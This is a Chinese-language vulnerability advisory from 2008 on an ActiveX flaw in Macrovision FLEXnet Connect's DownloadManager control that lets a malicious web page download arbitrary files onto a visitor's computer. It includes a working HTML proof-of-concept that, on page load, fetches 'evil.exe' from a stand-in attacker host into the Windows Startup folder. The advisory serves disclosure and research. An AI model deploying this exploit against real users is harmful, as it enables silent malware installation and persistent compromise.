发布日期：2008-01-14
更新日期：2008-01-15

受影响系统：

Macrovision FLEXnet Connect

描述：

---

BUGTRAQ  ID: 27279
CVE(CAN) ID: CVE-2008-4587,CVE-2008-4586

Macrovision FLEXnet Connect是一种应用软件的厂商为用户提供产品相关的更新及信息发布的工具。

FLEXnet Connect的ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞下载任意文件到用户系统。

FLEXnet Connect所使用的DownloadManager控件：

ISDM.exe version 6.1.100.61372
MVSNClientDownloadManager61Lib.DownloadManager
{FCED4482-7CCB-4E6F-86C9-DCB22B52843C}
IObjectSafety:
IO. Safe for scripting (IDispatch)

没有正确地验证一些函数的输入参数，如果用户受骗访问了恶意网页的话，就可能在用户不知情的情况下向系统下载任意文件。

<*来源：Elazar Broad （elazarb@earthlink.net）
  
  链接：http://marc.info/?l=full-disclosure&m=120034091427428&w=2
        http://secunia.com/advisories/28496/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
  <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
    
    var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");
    
    mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
    mJob.SetPriority(0);
    mJob.SetNotifyFlags(2);
    mJob.ScheduleInterval = 2;
    
    obj.RunScheduledJobs();
                
          
    }
  
   </script>
  </head>
<body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
     Unable to create object
    </object>
</body>
</html>

建议：

---

厂商补丁：

Macrovision
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.macrovision.com/

浏览次数：2620
严重程度：0（网友投票）